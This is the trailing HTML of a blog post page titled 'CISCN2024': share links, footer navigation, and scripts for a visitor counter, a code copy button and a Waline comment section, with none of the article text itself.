  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&is_video=false&description=CISCN2024"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=CISCN2024&body=Check out this article: https://baozongwi.xyz/2024/12/12/CISCN2024/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&title=CISCN2024"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&title=CISCN2024"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&title=CISCN2024"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&title=CISCN2024"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&name=CISCN2024&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://baozongwi.xyz/2024/12/12/CISCN2024/&t=CISCN2024"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        
<footer id="footer">
    <div class="footer-left">
        Copyright ©
        
        
        2024-2025
        baozongwi
        <br>
        <a href="https://beian.miit.gov.cn/" target="_blank">蜀ICP备2024111128号</a>
		<a href="https://www.dkdun.cn/" target="_blank">DK盾</a>
    </div>
    
    <div class="footer-right">
        <nav>
            <ul>
                <!--
                --><li><a href="/">H0me</a></li><!--
                --><!--
                --><li><a href="/about/">Aβout</a></li><!--
                --><!--
                --><li><a href="/tags/">Topi3s</a></li><!--
                --><!--
                --><li><a href="/categories/">Cat4gory</a></li><!--
                --><!--
                --><li><a href="/links/">Li^ks</a></li><!--
                --><!--
                --><li><a href="/search/">Seαrch</a></li><!--
                -->
            </ul>
            <ul>
                
                <!-- 不蒜子统计 -->
                <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
                <span class="post-meta-divider">|</span>
                <span id="busuanzi_container_site_uv" style='display:none'>本站访客数<span id="busuanzi_value_site_uv"></span>人</span>
                <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
                
            </ul>
        </nav>
    </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

<!-- Waline Comments -->

  <script type="module">
    import { init } from 'https://unpkg.com/@waline/client@v2/dist/waline.mjs';

    var EMOJI = ['//unpkg.com/@waline/emojis@1.2.0/weibo']
    var META = ['nick', 'mail', 'link'];
    var REQUIREDFIELDS = ['nick', 'mail', 'link'];

    var emoji = '//unpkg.com/@waline/emojis@1.2.0/qq'.split(',').filter(function(item){
      return item !== ''; // filter()返回满足不为空item
    });
    emoji = emoji.length == 0 ? EMOJI : emoji;

    var meta = 'nick,mail'.split(',').filter(function(item){
      return META.indexOf(item) > -1; // filter()返回满足META.indexOf(item) > -1为true的item
    });
    meta = meta.length == 0 ? META : meta;

    var requiredFields = 'nick,mail'.split(',').filter(function(item){
      return REQUIREDFIELDS.indexOf(item) > -1; // filter()返回满足META.indexOf(item) > -1为true的item
    });
    requiredFields = requiredFields.length == 0 ? REQUIREDFIELDS : requiredFields;

    init({
      el: '#waline_thread',
      serverURL: 'https://waline.baozongwi.xyz/', // Waline 的服务端地址
      path: '' == '' ? window.location.pathname : '', // 当前文章页路径，用于区分不同的文章页，以保证正确读取该文章页下的评论列表
      lang: 'zh-CN' == '' ? 'zh-CN' : 'zh-CN', // 多语言支持，未设置默认英文
      emoji: emoji,
      dark: 'auto', // 暗黑模式适配
      commentSorting: '' == '' ? 'latest' : '', // 评论列表排序方式
      meta: meta, // 评论者相关属性
      requiredFields: requiredFields, // 设置必填项，默认匿名
      login: '', // 登录模式状态
      wordLimit: '', // 评论字数限制
      pageSize: '10' == '' ? 10 : '10', // 评论列表分页，每页条数
      imageUploader: '', // 自定义图片上传方法
      highlighter: '', // 代码高亮
      locale: {
          placeholder: '你都看到这里了，不说两句就走？这不太好吧', 
          sofa: '這個評論區有點冷₍˄·͈༝·͈˄*₎◞ ̑̑', 
        },
      avatar: 'mp',
      visitor: 'false',
      comment_count: 'false',
    });
  </script>

</body>
</html>
